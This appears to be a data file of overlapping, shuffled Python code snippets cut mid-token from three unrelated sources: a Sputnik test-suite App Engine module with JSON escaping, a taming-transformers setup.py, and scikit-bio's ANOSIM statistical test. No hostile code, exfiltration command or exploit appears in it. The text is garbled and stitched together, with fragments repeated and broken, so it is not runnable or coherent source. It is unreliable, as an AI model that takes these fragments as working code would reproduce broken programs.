'\\\\n', '\\r': '\\\\r', '\\t': '\\\\t' } def json_escape(s): result = []", "db.IntegerProperty() is_negative = db.BooleanProperty() def to_json(self): return {'name': self.name, 'isNegative': self.is_negative, 'source': unicode(self.source)}", "end) return query.fetch(end - start) class Suite(db.Model): name = db.StringProperty() count = db.IntegerProperty()", "db.StringProperty() source = db.TextProperty() serial = db.IntegerProperty() is_negative = db.BooleanProperty() def to_json(self): return", "db.IntegerProperty() @staticmethod def lookup(suite): query = Suite.gql('WHERE name = :1', suite) return query.get()", "'isNegative': self.is_negative, 'source': unicode(self.source)} def to_basic_json(self): return to_json({'name': self.name, 'isNegative': self.is_negative, 'serial': self.serial})", "type(obj) if t is dict: props = [ ] for (key, value) in", "db.StringProperty() count = db.IntegerProperty() @staticmethod def lookup(suite): query = Suite.gql('WHERE name = :1',", "return to_json({'name': self.name, 'count': self.count}) class Version(db.Model): current_suite = db.StringProperty() created = db.DateTimeProperty(auto_now_add=True)", "from google.appengine.ext import db import cStringIO _ESCAPEES = { '\"': '\\\\\"', '\\\\': '\\\\\\\\',", "= db.StringProperty() source = db.TextProperty() serial = db.IntegerProperty() is_negative = db.BooleanProperty() def to_json(self):", "int) or (t is long): return str(obj) elif (t is str) or (t", "current_suite = db.StringProperty() created = db.DateTimeProperty(auto_now_add=True) @staticmethod def get(): query = Version.gql(\"ORDER BY", "query = Case.gql('WHERE suite = :1 AND serial >= :2 AND serial <", "c in s: escapee = _ESCAPEES.get(c, None) if escapee: result.append(escapee) elif c <", "# Copyright 2009 the Sputnik authors. All rights reserved. # This code is", "is bool: if obj: return '1' else: return '0' else: return to_json(obj.to_json()) class", "'{%s}' % ','.join(props) elif (t is int) or (t is long): return str(obj)", "db.StringProperty() suite = db.StringProperty() source = db.TextProperty() serial = db.IntegerProperty() is_negative = db.BooleanProperty()", "db.StringProperty() created = db.DateTimeProperty(auto_now_add=True) @staticmethod def get(): query = Version.gql(\"ORDER BY created DESC", "(key, value) in obj.items(): props.append('\"%s\":%s' % (json_escape(key), to_json(value))) return '{%s}' % ','.join(props) elif", "else: return to_json(obj.to_json()) class Case(db.Model): name = db.StringProperty() suite = db.StringProperty() source =", "self.is_negative, 'source': unicode(self.source)} def to_basic_json(self): return to_json({'name': self.name, 'isNegative': self.is_negative, 'serial': self.serial}) @staticmethod", "_ESCAPEES.get(c, None) if escapee: result.append(escapee) elif c < ' ': result.append(\"\\\\u%.4X\" % ord(c))", "str(obj) elif (t is str) or (t is unicode): return '\"%s\"' % json_escape(obj)", "return query.get() @staticmethod def lookup_range(suite, start, end): query = Case.gql('WHERE suite = :1", "name = db.StringProperty() count = db.IntegerProperty() @staticmethod def lookup(suite): query = Suite.gql('WHERE name", "% ord(c)) else: result.append(c) return \"\".join(result) def to_json(obj): t = type(obj) if t", "query.fetch(end - start) class Suite(db.Model): name = db.StringProperty() count = db.IntegerProperty() @staticmethod def", "AND serial = :2', suite, serial) return query.get() @staticmethod def lookup_range(suite, start, end):", "return query.fetch(end - start) class Suite(db.Model): name = db.StringProperty() count = db.IntegerProperty() @staticmethod", "self.serial}) @staticmethod def lookup(suite, serial): query = Case.gql('WHERE suite = :1 AND serial", "': result.append(\"\\\\u%.4X\" % ord(c)) else: result.append(c) return \"\".join(result) def to_json(obj): t = type(obj)", "class Version(db.Model): current_suite = db.StringProperty() created = db.DateTimeProperty(auto_now_add=True) @staticmethod def get(): query =", "<reponame>marintsev/sputniktests #!/usr/bin/python # Copyright 2009 the Sputnik authors. All rights reserved. # This", "elif (t is int) or (t is long): return str(obj) elif (t is", "return '1' else: return '0' else: return to_json(obj.to_json()) class Case(db.Model): name = db.StringProperty()", "to_json({'name': self.name, 'count': self.count}) class Version(db.Model): current_suite = db.StringProperty() created = db.DateTimeProperty(auto_now_add=True) @staticmethod", "json_escape(s): result = [] for c in s: escapee = _ESCAPEES.get(c, None) if", "result.append(c) return \"\".join(result) def to_json(obj): t = type(obj) if t is dict: props", "the LICENSE file. from google.appengine.ext import db import cStringIO _ESCAPEES = { '\"':", "= db.StringProperty() suite = db.StringProperty() source = db.TextProperty() serial = db.IntegerProperty() is_negative =", "return \"\".join(result) def to_json(obj): t = type(obj) if t is dict: props =", "return str(obj) elif (t is str) or (t is unicode): return '\"%s\"' %", "license found in the LICENSE file. from google.appengine.ext import db import cStringIO _ESCAPEES", "cStringIO _ESCAPEES = { '\"': '\\\\\"', '\\\\': '\\\\\\\\', '\\b': '\\\\b', '\\f': '\\\\f', '\\n':", "obj: return '1' else: return '0' else: return to_json(obj.to_json()) class Case(db.Model): name =", "count = db.IntegerProperty() @staticmethod def lookup(suite): query = Suite.gql('WHERE name = :1', suite)", "s: escapee = _ESCAPEES.get(c, None) if escapee: result.append(escapee) elif c < ' ':", "'isNegative': self.is_negative, 'serial': self.serial}) @staticmethod def lookup(suite, serial): query = Case.gql('WHERE suite =", "obj.items(): props.append('\"%s\":%s' % (json_escape(key), to_json(value))) return '{%s}' % ','.join(props) elif (t is int)", "suite, serial) return query.get() @staticmethod def lookup_range(suite, start, end): query = Case.gql('WHERE suite", "return '[%s]' % ','.join([to_json(o) for o in obj]) elif t is bool: if", "= Suite.gql('WHERE name = :1', suite) return query.get() def to_json(self): return to_json({'name': self.name,", "'\\\\\"', '\\\\': '\\\\\\\\', '\\b': '\\\\b', '\\f': '\\\\f', '\\n': '\\\\n', '\\r': '\\\\r', '\\t': '\\\\t'", "for c in s: escapee = _ESCAPEES.get(c, None) if escapee: result.append(escapee) elif c", "% ','.join([to_json(o) for o in obj]) elif t is bool: if obj: return", "self.name, 'count': self.count}) class Version(db.Model): current_suite = db.StringProperty() created = db.DateTimeProperty(auto_now_add=True) @staticmethod def", "Sputnik authors. All rights reserved. # This code is governed by the BSD", "end): query = Case.gql('WHERE suite = :1 AND serial >= :2 AND serial", "@staticmethod def lookup(suite): query = Suite.gql('WHERE name = :1', suite) return query.get() def", "elif (t is str) or (t is unicode): return '\"%s\"' % json_escape(obj) elif", "< :3', suite, start, end) return query.fetch(end - start) class Suite(db.Model): name =", "db.BooleanProperty() def to_json(self): return {'name': self.name, 'isNegative': self.is_negative, 'source': unicode(self.source)} def to_basic_json(self): return", "created = db.DateTimeProperty(auto_now_add=True) @staticmethod def get(): query = Version.gql(\"ORDER BY created DESC LIMIT", "= _ESCAPEES.get(c, None) if escapee: result.append(escapee) elif c < ' ': result.append(\"\\\\u%.4X\" %", "% json_escape(obj) elif (t is list): return '[%s]' % ','.join([to_json(o) for o in", "'\\\\b', '\\f': '\\\\f', '\\n': '\\\\n', '\\r': '\\\\r', '\\t': '\\\\t' } def json_escape(s): result", "serial = db.IntegerProperty() is_negative = db.BooleanProperty() def to_json(self): return {'name': self.name, 'isNegative': self.is_negative,", "(t is int) or (t is long): return str(obj) elif (t is str)", "start, end) return query.fetch(end - start) class Suite(db.Model): name = db.StringProperty() count =", "'\"': '\\\\\"', '\\\\': '\\\\\\\\', '\\b': '\\\\b', '\\f': '\\\\f', '\\n': '\\\\n', '\\r': '\\\\r', '\\t':", "escapee: result.append(escapee) elif c < ' ': result.append(\"\\\\u%.4X\" % ord(c)) else: result.append(c) return", "the BSD license found in the LICENSE file. from google.appengine.ext import db import", "to_json({'name': self.name, 'isNegative': self.is_negative, 'serial': self.serial}) @staticmethod def lookup(suite, serial): query = Case.gql('WHERE", ">= :2 AND serial < :3', suite, start, end) return query.fetch(end - start)", "= type(obj) if t is dict: props = [ ] for (key, value)", "for o in obj]) elif t is bool: if obj: return '1' else:", "(t is unicode): return '\"%s\"' % json_escape(obj) elif (t is list): return '[%s]'", "elif (t is list): return '[%s]' % ','.join([to_json(o) for o in obj]) elif", "to_json(value))) return '{%s}' % ','.join(props) elif (t is int) or (t is long):", "This code is governed by the BSD license found in the LICENSE file.", "suite = :1 AND serial = :2', suite, serial) return query.get() @staticmethod def", "query = Suite.gql('WHERE name = :1', suite) return query.get() def to_json(self): return to_json({'name':", ":1 AND serial = :2', suite, serial) return query.get() @staticmethod def lookup_range(suite, start,", "class Suite(db.Model): name = db.StringProperty() count = db.IntegerProperty() @staticmethod def lookup(suite): query =", "'source': unicode(self.source)} def to_basic_json(self): return to_json({'name': self.name, 'isNegative': self.is_negative, 'serial': self.serial}) @staticmethod def", "is governed by the BSD license found in the LICENSE file. from google.appengine.ext", "(json_escape(key), to_json(value))) return '{%s}' % ','.join(props) elif (t is int) or (t is", "serial) return query.get() @staticmethod def lookup_range(suite, start, end): query = Case.gql('WHERE suite =", "else: result.append(c) return \"\".join(result) def to_json(obj): t = type(obj) if t is dict:", "< ' ': result.append(\"\\\\u%.4X\" % ord(c)) else: result.append(c) return \"\".join(result) def to_json(obj): t", "props.append('\"%s\":%s' % (json_escape(key), to_json(value))) return '{%s}' % ','.join(props) elif (t is int) or" ]
[ "setuptools import setup, find_packages with open('requirements.txt') as f: required = f.read().splitlines() setup( name='taming-transformers',", "from setuptools import setup, find_packages with open('requirements.txt') as f: required = f.read().splitlines() setup(", "setup, find_packages with open('requirements.txt') as f: required = f.read().splitlines() setup( name='taming-transformers', version='0.0.1-eden', description='Taming", "f: required = f.read().splitlines() setup( name='taming-transformers', version='0.0.1-eden', description='Taming Transformers for High-Resolution Image Synthesis',", "f.read().splitlines() setup( name='taming-transformers', version='0.0.1-eden', description='Taming Transformers for High-Resolution Image Synthesis', packages=find_packages(), include_package_data=True, install_requires=", "as f: required = f.read().splitlines() setup( name='taming-transformers', version='0.0.1-eden', description='Taming Transformers for High-Resolution Image", "required = f.read().splitlines() setup( name='taming-transformers', version='0.0.1-eden', description='Taming Transformers for High-Resolution Image Synthesis', packages=find_packages(),", "find_packages with open('requirements.txt') as f: required = f.read().splitlines() setup( name='taming-transformers', version='0.0.1-eden', description='Taming Transformers", "= f.read().splitlines() setup( name='taming-transformers', version='0.0.1-eden', description='Taming Transformers for High-Resolution Image Synthesis', packages=find_packages(), include_package_data=True,", "name='taming-transformers', version='0.0.1-eden', description='Taming Transformers for High-Resolution Image Synthesis', packages=find_packages(), include_package_data=True, install_requires= required, )", "setup( name='taming-transformers', version='0.0.1-eden', description='Taming Transformers for High-Resolution Image Synthesis', packages=find_packages(), include_package_data=True, install_requires= required,", "import setup, find_packages with open('requirements.txt') as f: required = f.read().splitlines() setup( name='taming-transformers', version='0.0.1-eden',", "with open('requirements.txt') as f: required = f.read().splitlines() setup( name='taming-transformers', version='0.0.1-eden', description='Taming Transformers for", "open('requirements.txt') as f: required = f.read().splitlines() setup( name='taming-transformers', version='0.0.1-eden', description='Taming Transformers for High-Resolution" ]
[ "the grouping matrix. It is important to # extract the values in the", "return self._compute_r_stat(grouping_tri) def _compute_r_stat(self, grouping_tri): # within r_W = np.mean(self._ranked_dists[grouping_tri]) # between r_B", "matrix where True means that the two objects are in the same #", "means that the two objects are in the same # group. This ufunc", "with a grouping vector of strings). grouping_matrix = np.equal.outer(grouping, grouping) # Extract upper", "interface are similar to ``vegan::anosim``, available in R's vegan package [2]_. References ----------", "algorithm and interface are similar to ``vegan::anosim``, available in R's vegan package [2]_.", "preserves this order. grouping_tri = grouping_matrix[self._tri_idxs] return self._compute_r_stat(grouping_tri) def _compute_r_stat(self, grouping_tri): # within", "from the grouping matrix. It is important to # extract the values in", "# ---------------------------------------------------------------------------- from __future__ import absolute_import, division, print_function import numpy as np from", "test_statistic_name = 'R statistic' def __init__(self, distance_matrix, grouping, column=None): super(ANOSIM, self).__init__(distance_matrix, grouping, column=column)", "in the file COPYING.txt, distributed with this software. # ---------------------------------------------------------------------------- from __future__ import", "_run(self, grouping): \"\"\"Compute ANOSIM R statistic (between -1 and +1).\"\"\" # Create a", "random grouping. Notes ----- See [1]_ for the original ANOSIM reference. The general", "/usr/bin/env python # ---------------------------------------------------------------------------- # Copyright (c) 2013--, scikit-bio development team. # #", "self).__init__(distance_matrix, grouping, column=column) self._divisor = self._dm.shape[0] * ((self._dm.shape[0] - 1) / 4) self._ranked_dists", "different based on a categorical factor. The ranks of the distances in the", "._base import CategoricalStats class ANOSIM(CategoricalStats): \"\"\"ANOSIM statistical method executor. Analysis of Similarities (ANOSIM)", "column=column) self._divisor = self._dm.shape[0] * ((self._dm.shape[0] - 1) / 4) self._ranked_dists = rankdata(self._dm.condensed_form(),", "same # group. This ufunc requires that grouping is a numeric vector (e.g.,", "\"\"\"Compute ANOSIM R statistic (between -1 and +1).\"\"\" # Create a matrix where", "self._compute_r_stat(grouping_tri) def _compute_r_stat(self, grouping_tri): # within r_W = np.mean(self._ranked_dists[grouping_tri]) # between r_B =", "# ---------------------------------------------------------------------------- # Copyright (c) 2013--, scikit-bio development team. # # Distributed under", "two or more groups of objects are significantly different based on a categorical", "__future__ import absolute_import, division, print_function import numpy as np from scipy.stats import rankdata", "column=None): super(ANOSIM, self).__init__(distance_matrix, grouping, column=column) self._divisor = self._dm.shape[0] * ((self._dm.shape[0] - 1) /", "import rankdata from ._base import CategoricalStats class ANOSIM(CategoricalStats): \"\"\"ANOSIM statistical method executor. Analysis", "of strings). grouping_matrix = np.equal.outer(grouping, grouping) # Extract upper triangle from the grouping", "objects are in the same # group. This ufunc requires that grouping is", "an R statistic, which ranges between -1 (anti-grouping) to +1 (strong grouping), with", "rankdata from ._base import CategoricalStats class ANOSIM(CategoricalStats): \"\"\"ANOSIM statistical method executor. Analysis of", "within r_W = np.mean(self._ranked_dists[grouping_tri]) # between r_B = np.mean(self._ranked_dists[np.invert(grouping_tri)]) return (r_B - r_W)", "that the two objects are in the same # group. This ufunc requires", "-1 and +1).\"\"\" # Create a matrix where True means that the two", "short_method_name = 'ANOSIM' long_method_name = 'Analysis of Similarities' test_statistic_name = 'R statistic' def", "http://cran.r-project.org/web/packages/vegan/index.html \"\"\" short_method_name = 'ANOSIM' long_method_name = 'Analysis of Similarities' test_statistic_name = 'R", "that the distances are extracted # from the distance matrix (see self._ranked_dists). Extracting", "distance matrix are used to calculate an R statistic, which ranges between -1", "(anti-grouping) to +1 (strong grouping), with an R value of 0 indicating random", "<NAME>. \"Non-parametric multivariate analyses of changes in community structure.\" Australian journal of ecology", "Create a matrix where True means that the two objects are in the", "from __future__ import absolute_import, division, print_function import numpy as np from scipy.stats import", "the distance matrix are used to calculate an R statistic, which ranges between", "# from the distance matrix (see self._ranked_dists). Extracting the # upper triangle (excluding", "[1]_ for the original ANOSIM reference. The general algorithm and interface are similar", "= np.equal.outer(grouping, grouping) # Extract upper triangle from the grouping matrix. It is", "python # ---------------------------------------------------------------------------- # Copyright (c) 2013--, scikit-bio development team. # # Distributed", "order that the distances are extracted # from the distance matrix (see self._ranked_dists).", "to ``vegan::anosim``, available in R's vegan package [2]_. References ---------- .. [1] <NAME>.", "- 1) / 4) self._ranked_dists = rankdata(self._dm.condensed_form(), method='average') def _run(self, grouping): \"\"\"Compute ANOSIM", "are similar to ``vegan::anosim``, available in R's vegan package [2]_. References ---------- ..", "and +1).\"\"\" # Create a matrix where True means that the two objects", "grouping is a numeric vector (e.g., # it won't work with a grouping", "4) self._ranked_dists = rankdata(self._dm.condensed_form(), method='average') def _run(self, grouping): \"\"\"Compute ANOSIM R statistic (between", "1) / 4) self._ranked_dists = rankdata(self._dm.condensed_form(), method='average') def _run(self, grouping): \"\"\"Compute ANOSIM R", "# # Distributed under the terms of the Modified BSD License. # #", "two objects are in the same # group. This ufunc requires that grouping", "the distances are extracted # from the distance matrix (see self._ranked_dists). Extracting the", "(c) 2013--, scikit-bio development team. # # Distributed under the terms of the", "the diagonal) preserves this order. grouping_tri = grouping_matrix[self._tri_idxs] return self._compute_r_stat(grouping_tri) def _compute_r_stat(self, grouping_tri):", "license is in the file COPYING.txt, distributed with this software. # ---------------------------------------------------------------------------- from", "= 'Analysis of Similarities' test_statistic_name = 'R statistic' def __init__(self, distance_matrix, grouping, column=None):", "R's vegan package [2]_. References ---------- .. [1] <NAME>. \"Non-parametric multivariate analyses of", "(see self._ranked_dists). Extracting the # upper triangle (excluding the diagonal) preserves this order.", "grouping_tri = grouping_matrix[self._tri_idxs] return self._compute_r_stat(grouping_tri) def _compute_r_stat(self, grouping_tri): # within r_W = np.mean(self._ranked_dists[grouping_tri])", "tests whether two or more groups of objects are significantly different based on", "file COPYING.txt, distributed with this software. # ---------------------------------------------------------------------------- from __future__ import absolute_import, division,", "CategoricalStats class ANOSIM(CategoricalStats): \"\"\"ANOSIM statistical method executor. Analysis of Similarities (ANOSIM) is a", "more groups of objects are significantly different based on a categorical factor. The", "absolute_import, division, print_function import numpy as np from scipy.stats import rankdata from ._base", "_compute_r_stat(self, grouping_tri): # within r_W = np.mean(self._ranked_dists[grouping_tri]) # between r_B = np.mean(self._ranked_dists[np.invert(grouping_tri)]) return", "# Copyright (c) 2013--, scikit-bio development team. # # Distributed under the terms", "based on a categorical factor. The ranks of the distances in the distance", "def _compute_r_stat(self, grouping_tri): # within r_W = np.mean(self._ranked_dists[grouping_tri]) # between r_B = np.mean(self._ranked_dists[np.invert(grouping_tri)])", "2013--, scikit-bio development team. # # Distributed under the terms of the Modified", "Distributed under the terms of the Modified BSD License. # # The full", "extract the values in the same order that the distances are extracted #", "objects are significantly different based on a categorical factor. The ranks of the", "COPYING.txt, distributed with this software. # ---------------------------------------------------------------------------- from __future__ import absolute_import, division, print_function", "package [2]_. References ---------- .. [1] <NAME>. \"Non-parametric multivariate analyses of changes in", "same order that the distances are extracted # from the distance matrix (see", "the values in the same order that the distances are extracted # from", "the Modified BSD License. # # The full license is in the file", "of 0 indicating random grouping. Notes ----- See [1]_ for the original ANOSIM", "upper triangle (excluding the diagonal) preserves this order. grouping_tri = grouping_matrix[self._tri_idxs] return self._compute_r_stat(grouping_tri)", "grouping_tri): # within r_W = np.mean(self._ranked_dists[grouping_tri]) # between r_B = np.mean(self._ranked_dists[np.invert(grouping_tri)]) return (r_B", "diagonal) preserves this order. grouping_tri = grouping_matrix[self._tri_idxs] return self._compute_r_stat(grouping_tri) def _compute_r_stat(self, grouping_tri): #", "grouping matrix. It is important to # extract the values in the same", "Notes ----- See [1]_ for the original ANOSIM reference. The general algorithm and", "* ((self._dm.shape[0] - 1) / 4) self._ranked_dists = rankdata(self._dm.condensed_form(), method='average') def _run(self, grouping):", "to calculate an R statistic, which ranges between -1 (anti-grouping) to +1 (strong", "ecology 18.1 (1993): 117-143. .. [2] http://cran.r-project.org/web/packages/vegan/index.html \"\"\" short_method_name = 'ANOSIM' long_method_name =", "'Analysis of Similarities' test_statistic_name = 'R statistic' def __init__(self, distance_matrix, grouping, column=None): super(ANOSIM,", "0 indicating random grouping. Notes ----- See [1]_ for the original ANOSIM reference.", "are used to calculate an R statistic, which ranges between -1 (anti-grouping) to", "groups of objects are significantly different based on a categorical factor. The ranks", "method executor. Analysis of Similarities (ANOSIM) is a non-parametric method that tests whether", "Extract upper triangle from the grouping matrix. It is important to # extract", "values in the same order that the distances are extracted # from the", "Australian journal of ecology 18.1 (1993): 117-143. .. [2] http://cran.r-project.org/web/packages/vegan/index.html \"\"\" short_method_name =", "categorical factor. The ranks of the distances in the distance matrix are used", "is important to # extract the values in the same order that the", "'R statistic' def __init__(self, distance_matrix, grouping, column=None): super(ANOSIM, self).__init__(distance_matrix, grouping, column=column) self._divisor =", "np from scipy.stats import rankdata from ._base import CategoricalStats class ANOSIM(CategoricalStats): \"\"\"ANOSIM statistical", "the terms of the Modified BSD License. # # The full license is", "grouping. Notes ----- See [1]_ for the original ANOSIM reference. The general algorithm", "[2]_. References ---------- .. [1] <NAME>. \"Non-parametric multivariate analyses of changes in community", "= 'R statistic' def __init__(self, distance_matrix, grouping, column=None): super(ANOSIM, self).__init__(distance_matrix, grouping, column=column) self._divisor", "super(ANOSIM, self).__init__(distance_matrix, grouping, column=column) self._divisor = self._dm.shape[0] * ((self._dm.shape[0] - 1) / 4)", "(strong grouping), with an R value of 0 indicating random grouping. Notes -----", "team. # # Distributed under the terms of the Modified BSD License. #", "def __init__(self, distance_matrix, grouping, column=None): super(ANOSIM, self).__init__(distance_matrix, grouping, column=column) self._divisor = self._dm.shape[0] *", "grouping) # Extract upper triangle from the grouping matrix. It is important to", "of the distances in the distance matrix are used to calculate an R", "((self._dm.shape[0] - 1) / 4) self._ranked_dists = rankdata(self._dm.condensed_form(), method='average') def _run(self, grouping): \"\"\"Compute", "Analysis of Similarities (ANOSIM) is a non-parametric method that tests whether two or", "significantly different based on a categorical factor. The ranks of the distances in", "= grouping_matrix[self._tri_idxs] return self._compute_r_stat(grouping_tri) def _compute_r_stat(self, grouping_tri): # within r_W = np.mean(self._ranked_dists[grouping_tri]) #", "# extract the values in the same order that the distances are extracted", "method='average') def _run(self, grouping): \"\"\"Compute ANOSIM R statistic (between -1 and +1).\"\"\" #", "where True means that the two objects are in the same # group.", "a non-parametric method that tests whether two or more groups of objects are", "[2] http://cran.r-project.org/web/packages/vegan/index.html \"\"\" short_method_name = 'ANOSIM' long_method_name = 'Analysis of Similarities' test_statistic_name =", "statistic, which ranges between -1 (anti-grouping) to +1 (strong grouping), with an R", "grouping), with an R value of 0 indicating random grouping. Notes ----- See", "from scipy.stats import rankdata from ._base import CategoricalStats class ANOSIM(CategoricalStats): \"\"\"ANOSIM statistical method", "under the terms of the Modified BSD License. # # The full license", "triangle from the grouping matrix. It is important to # extract the values", "executor. Analysis of Similarities (ANOSIM) is a non-parametric method that tests whether two", "import numpy as np from scipy.stats import rankdata from ._base import CategoricalStats class", "ANOSIM reference. The general algorithm and interface are similar to ``vegan::anosim``, available in", "statistic' def __init__(self, distance_matrix, grouping, column=None): super(ANOSIM, self).__init__(distance_matrix, grouping, column=column) self._divisor = self._dm.shape[0]", "that tests whether two or more groups of objects are significantly different based", ".. [1] <NAME>. \"Non-parametric multivariate analyses of changes in community structure.\" Australian journal", "are significantly different based on a categorical factor. The ranks of the distances", "rankdata(self._dm.condensed_form(), method='average') def _run(self, grouping): \"\"\"Compute ANOSIM R statistic (between -1 and +1).\"\"\"", "def _run(self, grouping): \"\"\"Compute ANOSIM R statistic (between -1 and +1).\"\"\" # Create", "is a non-parametric method that tests whether two or more groups of objects", "# within r_W = np.mean(self._ranked_dists[grouping_tri]) # between r_B = np.mean(self._ranked_dists[np.invert(grouping_tri)]) return (r_B -", "similar to ``vegan::anosim``, available in R's vegan package [2]_. References ---------- .. [1]", "Modified BSD License. # # The full license is in the file COPYING.txt,", "on a categorical factor. The ranks of the distances in the distance matrix", "factor. The ranks of the distances in the distance matrix are used to", "in the same order that the distances are extracted # from the distance", "is a numeric vector (e.g., # it won't work with a grouping vector", "are extracted # from the distance matrix (see self._ranked_dists). Extracting the # upper", "\"\"\"ANOSIM statistical method executor. Analysis of Similarities (ANOSIM) is a non-parametric method that", "``vegan::anosim``, available in R's vegan package [2]_. References ---------- .. [1] <NAME>. \"Non-parametric", "community structure.\" Australian journal of ecology 18.1 (1993): 117-143. .. [2] http://cran.r-project.org/web/packages/vegan/index.html \"\"\"", "R statistic, which ranges between -1 (anti-grouping) to +1 (strong grouping), with an", "+1).\"\"\" # Create a matrix where True means that the two objects are", "See [1]_ for the original ANOSIM reference. The general algorithm and interface are", "upper triangle from the grouping matrix. It is important to # extract the", "ANOSIM R statistic (between -1 and +1).\"\"\" # Create a matrix where True", "distance matrix (see self._ranked_dists). Extracting the # upper triangle (excluding the diagonal) preserves", "scikit-bio development team. # # Distributed under the terms of the Modified BSD", "BSD License. # # The full license is in the file COPYING.txt, distributed", "full license is in the file COPYING.txt, distributed with this software. # ----------------------------------------------------------------------------", "general algorithm and interface are similar to ``vegan::anosim``, available in R's vegan package", "with this software. # ---------------------------------------------------------------------------- from __future__ import absolute_import, division, print_function import numpy", "self._divisor = self._dm.shape[0] * ((self._dm.shape[0] - 1) / 4) self._ranked_dists = rankdata(self._dm.condensed_form(), method='average')", "which ranges between -1 (anti-grouping) to +1 (strong grouping), with an R value", "are in the same # group. This ufunc requires that grouping is a", "statistic (between -1 and +1).\"\"\" # Create a matrix where True means that", "won't work with a grouping vector of strings). grouping_matrix = np.equal.outer(grouping, grouping) #", "import absolute_import, division, print_function import numpy as np from scipy.stats import rankdata from", "the same # group. This ufunc requires that grouping is a numeric vector", "the # upper triangle (excluding the diagonal) preserves this order. grouping_tri = grouping_matrix[self._tri_idxs]", "scipy.stats import rankdata from ._base import CategoricalStats class ANOSIM(CategoricalStats): \"\"\"ANOSIM statistical method executor.", "---------------------------------------------------------------------------- from __future__ import absolute_import, division, print_function import numpy as np from scipy.stats", "whether two or more groups of objects are significantly different based on a", "self._ranked_dists = rankdata(self._dm.condensed_form(), method='average') def _run(self, grouping): \"\"\"Compute ANOSIM R statistic (between -1", "# it won't work with a grouping vector of strings). grouping_matrix = np.equal.outer(grouping,", "__init__(self, distance_matrix, grouping, column=None): super(ANOSIM, self).__init__(distance_matrix, grouping, column=column) self._divisor = self._dm.shape[0] * ((self._dm.shape[0]", "triangle (excluding the diagonal) preserves this order. grouping_tri = grouping_matrix[self._tri_idxs] return self._compute_r_stat(grouping_tri) def", "distances are extracted # from the distance matrix (see self._ranked_dists). Extracting the #", "and interface are similar to ``vegan::anosim``, available in R's vegan package [2]_. References", "The full license is in the file COPYING.txt, distributed with this software. #", "# group. This ufunc requires that grouping is a numeric vector (e.g., #", "analyses of changes in community structure.\" Australian journal of ecology 18.1 (1993): 117-143.", "R statistic (between -1 and +1).\"\"\" # Create a matrix where True means", "value of 0 indicating random grouping. Notes ----- See [1]_ for the original", "numpy as np from scipy.stats import rankdata from ._base import CategoricalStats class ANOSIM(CategoricalStats):", "changes in community structure.\" Australian journal of ecology 18.1 (1993): 117-143. .. [2]", "Extracting the # upper triangle (excluding the diagonal) preserves this order. grouping_tri =", "= self._dm.shape[0] * ((self._dm.shape[0] - 1) / 4) self._ranked_dists = rankdata(self._dm.condensed_form(), method='average') def", "in R's vegan package [2]_. References ---------- .. [1] <NAME>. \"Non-parametric multivariate analyses", "numeric vector (e.g., # it won't work with a grouping vector of strings).", "The general algorithm and interface are similar to ``vegan::anosim``, available in R's vegan", "reference. The general algorithm and interface are similar to ``vegan::anosim``, available in R's", "available in R's vegan package [2]_. References ---------- .. [1] <NAME>. \"Non-parametric multivariate", "# Create a matrix where True means that the two objects are in", "important to # extract the values in the same order that the distances", "distance_matrix, grouping, column=None): super(ANOSIM, self).__init__(distance_matrix, grouping, column=column) self._divisor = self._dm.shape[0] * ((self._dm.shape[0] -", "(1993): 117-143. .. [2] http://cran.r-project.org/web/packages/vegan/index.html \"\"\" short_method_name = 'ANOSIM' long_method_name = 'Analysis of", "an R value of 0 indicating random grouping. Notes ----- See [1]_ for", "non-parametric method that tests whether two or more groups of objects are significantly", "the two objects are in the same # group. This ufunc requires that", "of changes in community structure.\" Australian journal of ecology 18.1 (1993): 117-143. ..", "between -1 (anti-grouping) to +1 (strong grouping), with an R value of 0", "this order. grouping_tri = grouping_matrix[self._tri_idxs] return self._compute_r_stat(grouping_tri) def _compute_r_stat(self, grouping_tri): # within r_W", "in the distance matrix are used to calculate an R statistic, which ranges", "self._ranked_dists). Extracting the # upper triangle (excluding the diagonal) preserves this order. grouping_tri", "License. # # The full license is in the file COPYING.txt, distributed with", "---------- .. [1] <NAME>. \"Non-parametric multivariate analyses of changes in community structure.\" Australian", "statistical method executor. Analysis of Similarities (ANOSIM) is a non-parametric method that tests", "+1 (strong grouping), with an R value of 0 indicating random grouping. Notes", "matrix are used to calculate an R statistic, which ranges between -1 (anti-grouping)", "ufunc requires that grouping is a numeric vector (e.g., # it won't work", "# Distributed under the terms of the Modified BSD License. # # The", "development team. # # Distributed under the terms of the Modified BSD License.", "group. This ufunc requires that grouping is a numeric vector (e.g., # it", "from ._base import CategoricalStats class ANOSIM(CategoricalStats): \"\"\"ANOSIM statistical method executor. Analysis of Similarities", "to +1 (strong grouping), with an R value of 0 indicating random grouping.", "np.equal.outer(grouping, grouping) # Extract upper triangle from the grouping matrix. It is important", "the distances in the distance matrix are used to calculate an R statistic,", "# upper triangle (excluding the diagonal) preserves this order. grouping_tri = grouping_matrix[self._tri_idxs] return", "terms of the Modified BSD License. # # The full license is in", "that grouping is a numeric vector (e.g., # it won't work with a", "True means that the two objects are in the same # group. This", "original ANOSIM reference. The general algorithm and interface are similar to ``vegan::anosim``, available", "used to calculate an R statistic, which ranges between -1 (anti-grouping) to +1", "in community structure.\" Australian journal of ecology 18.1 (1993): 117-143. .. [2] http://cran.r-project.org/web/packages/vegan/index.html", ".. [2] http://cran.r-project.org/web/packages/vegan/index.html \"\"\" short_method_name = 'ANOSIM' long_method_name = 'Analysis of Similarities' test_statistic_name", "indicating random grouping. Notes ----- See [1]_ for the original ANOSIM reference. The", "distributed with this software. # ---------------------------------------------------------------------------- from __future__ import absolute_import, division, print_function import", "\"Non-parametric multivariate analyses of changes in community structure.\" Australian journal of ecology 18.1", "---------------------------------------------------------------------------- # Copyright (c) 2013--, scikit-bio development team. # # Distributed under the", "vegan package [2]_. References ---------- .. [1] <NAME>. \"Non-parametric multivariate analyses of changes", "18.1 (1993): 117-143. .. [2] http://cran.r-project.org/web/packages/vegan/index.html \"\"\" short_method_name = 'ANOSIM' long_method_name = 'Analysis", "extracted # from the distance matrix (see self._ranked_dists). Extracting the # upper triangle", "= np.mean(self._ranked_dists[grouping_tri]) # between r_B = np.mean(self._ranked_dists[np.invert(grouping_tri)]) return (r_B - r_W) / self._divisor", "Similarities (ANOSIM) is a non-parametric method that tests whether two or more groups", "import CategoricalStats class ANOSIM(CategoricalStats): \"\"\"ANOSIM statistical method executor. Analysis of Similarities (ANOSIM) is", "----- See [1]_ for the original ANOSIM reference. The general algorithm and interface", "with an R value of 0 indicating random grouping. Notes ----- See [1]_", "The ranks of the distances in the distance matrix are used to calculate", "of the Modified BSD License. # # The full license is in the", "= rankdata(self._dm.condensed_form(), 